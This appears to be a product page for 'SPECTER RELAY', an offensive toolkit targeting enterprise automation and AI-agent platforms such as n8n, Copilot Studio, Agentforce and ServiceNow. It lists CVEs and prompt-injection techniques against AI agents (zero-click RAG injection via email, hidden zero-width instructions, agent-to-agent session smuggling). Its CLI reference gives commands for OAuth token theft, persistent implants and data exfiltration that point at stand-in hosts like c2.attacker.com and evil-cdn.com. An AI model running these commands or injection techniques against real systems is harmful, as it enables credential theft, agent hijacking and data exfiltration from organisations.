NIGHTFALL — TOOL 96 — WMD-CLASS

SPECTER RELAY

Enterprise No-Code/Low-Code Agent Platform Exploitation Engine

Targets the 2026 enterprise automation attack surface: n8n · Zapier · Make.com · Power Automate · Salesforce Agentforce · Microsoft Copilot Studio · ServiceNow Now Assist. These platforms run with high privilege, direct access to CRM data, email, SharePoint, ITSM systems — the perfect pivot point. SPECTER RELAY fingerprints, exploits, hijacks OAuth tokens, builds rogue implants that survive deactivation, and exfiltrates data via the platform's own trusted connectors.

7
Platforms
355
Tests
8
Subsystems
15+
CVEs / TTPs
WMD-CLASS nocode_agent_rce tenant_oauth_harvest connector_exfil_chain OPEN INJECT UNLEASHED
DOCS & CLI REFERENCE ALL 96 TOOLS →
CVE Coverage

15 CVEs & TTPs Across 7 Platforms

Every CVE is implemented as a working PoC payload builder, not a scanner. INJECT gate required for live fire.

CVE / TTPPlatformCVSSTechnique
CVE-2026-21858 "Ni8mare"n8n10.0Unauth RCE via Content-Type confusion, webhook form endpoint
CVE-2025-68668 "N8scape"n8n9.9Pyodide sandbox escape via ctypes — runs in n8n worker process
CVE-2025-68613n8n9.8Expression injection RCE via jmespath sink
CVE-2025-68697n8nLegacy JS code node arbitrary file read/write
CVE-2026-21877n8n9.9Workflow RCE chain
CVE-2025-32711 "EchoLeak"Copilot Studio / M3659.30-click RAG injection via inbound email — silently exfiltrates mailbox
CVE-2026-21520 "ShareLeak"Copilot Studio7.5SharePoint connector exfil via adaptive card form injection
CVE-2025-12420ServiceNow9.3Second-order agent-to-agent injection — bypasses MFA/SSO
CVE-2026-40374Power Automate DesktopSecrets disclosed in %TEMP%
ForcedLeak (CVSS 9.4)Agentforce9.4Web-to-Lead CSP whitelist expired domain hijack → CRM exfil
CoPhishCopilot StudioOAuth token theft via Sign-in topic — Datadog Labs 2025
Prompt MinesAgentforce0-click data corruption via hidden zero-width char instructions in records
Zenity DLP Bypass QuartetPower Platform4 techniques bypassing Microsoft Power Platform DLP policies
AgentFlayerCross-platformZero-click cross-platform chain — Zenity Black Hat 2025
Agent Session SmugglingA2AStateful A2A injection between orchestrator/tool — Unit42 PAN 2026
Architecture

8 Subsystems

Each subsystem is independently addressable from the CLI. SURVEY and HARVEST are OPEN-gate. INJECT, HIJACK, CHAIN require INJECT gate. PERSIST and live EXFIL require UNLEASHED.

01 / SURVEY

Platform Fingerprinting

Multi-platform fingerprinting across 7 enterprise automation targets. HTTP header/path probing, version detection, CVE applicability mapping (by n8n version). ServiceNow agent discovery. Power Automate Desktop secrets path enumeration.

02 / HARVEST

Blueprint Credential Extraction

Parses exported workflow JSON, Power Platform solution.zip, Salesforce metadata XML. 14 secret patterns — OpenAI, Anthropic, AWS, GitHub, Slack, Stripe, SendGrid, Twilio, Zapier MCP mcp.json. Connected service enumeration.

03 / INJECT

CVE Exploitation

Working PoC payload builders for all 15 CVEs/TTPs listed above. InjectPayload dataclass with full headers, method, path, gate. Async fire() for live execution (INJECT gate). Power Platform DLP bypass quartet returns 4 separate payloads.

04 / HIJACK

OAuth Token Theft

CoPhish — Copilot Studio Sign-in topic with attacker redirect URI. Multi-tenant Entra app manifest + phishing consent URL. Token validation via Microsoft Graph. Zapier MCP mcp.json credential dump via prompt injection.

05 / CHAIN

Trust Graph Escalation

NetworkX DiGraph of agent trust relationships. Dijkstra escalation path finder by privilege delta. ServiceNow CVE-2025-12420 second-order pivot. AgentFlayer cross-platform chain builder. Agent Session Smuggling (Unit42). JSON-LD export for court-admissible reporting.

06 / PERSIST

Rogue Workflow Implants

n8n cron rearm — cron node self-reactivates after manual deactivation. Power Automate hidden dev environment clone (weaker DLP). Copilot Studio cross-tenant bot share (survives victim deletion). Make.com restartOnError=true. Agentforce SYSTEM_CONTEXT Apex Connected App. ServiceNow server-side business rule. All UNLEASHED-gated.

07 / EXFIL

Connector-Based Data Extraction

CSP whitelist hunter (ForcedLeak generalisation) — scans platform allowlists for expired/registerable domains via DNS + HTTP. ConnectorExfil: Agentforce CRM exfil (ForcedLeak), Copilot SharePoint (ShareLeak), Power Automate unblockable connector, n8n HTTP node, ServiceNow gs.sendEmail. Canary staging at INJECT level.

08 / REPORT

Ed25519-Signed Reports

RLY-{hex12} report IDs. Ed25519 signing via PyNaCl. JSON-LD output with @context, finding counts, WMD class counts, evidence hash (SHA-256). Verify() checks signature integrity. Full finding metadata: MITRE ATLAS, OWASP, CVE, CVSS, remediation.

CLI Reference

specter-relay

# Install $ pip install red-specter-specter-relay $ specter-relay --version # Auth setup $ specter-relay auth init $ specter-relay auth create-scope --target https://n8n.corp.com --target https://instance.service-now.com $ specter-relay auth status # SURVEY — fingerprint platforms $ specter-relay survey --target https://n8n.corp.com --target https://instance.service-now.com # HARVEST — extract credentials from exported blueprints $ specter-relay harvest workflow_export.json $ specter-relay harvest power_platform_solution.zip # INJECT — build and optionally fire CVE payloads $ specter-relay inject --platform n8n --cve CVE-2026-21858 --target https://n8n.corp.com $ specter-relay inject --platform copilot_studio --cve CVE-2025-32711 # HIJACK — OAuth token theft setup $ specter-relay hijack cophish --bot-name "SupportBot" --redirect-uri https://listener.attacker.com/callback $ specter-relay hijack zapier-mcp # CHAIN — trust graph escalation $ specter-relay chain agentflayer $ specter-relay chain session-smuggling --endpoint https://a2a.corp.com/api # PERSIST — rogue implant payloads (UNLEASHED required) $ specter-relay persist n8n-cron-rearm --c2 https://c2.attacker.com $ specter-relay persist copilot-cross-tenant --victim-tenant VICTIM_ID --attacker-tenant ATTACKER_ID --c2 https://c2.attacker.com # EXFIL — data extraction via trusted connectors (UNLEASHED required) $ specter-relay exfil agentforce --sf-instance https://myorg.salesforce.com --exfil-domain evil-cdn.com $ specter-relay exfil csp-scan --platform agentforce # REPORT — generate signed engagement report $ specter-relay report --target https://target.example.com --operator "Red Specter"
Framework Coverage

MITRE ATLAS & OWASP

MITRE ATLAS

AML.T0051 — LLM Prompt Injection
AML.T0054 — LLM Jailbreak
AML.T0020 — Poison Training Data
AML.T0043 — Craft Adversarial Data
AML.T0048 — Exfiltration via ML Inference API
AML.T0049 — Evade ML Model

OWASP

LLM01 — Prompt Injection
LLM02 — Sensitive Information Disclosure
LLM06 — Excessive Agency
LLM08 — Excessive Permissions
Agentic: AST01 / AST02 / AST03 / AST05 / AST07 / AST08 / AST09
MCP Top 10 2026: Tool Poisoning, Credential Exposure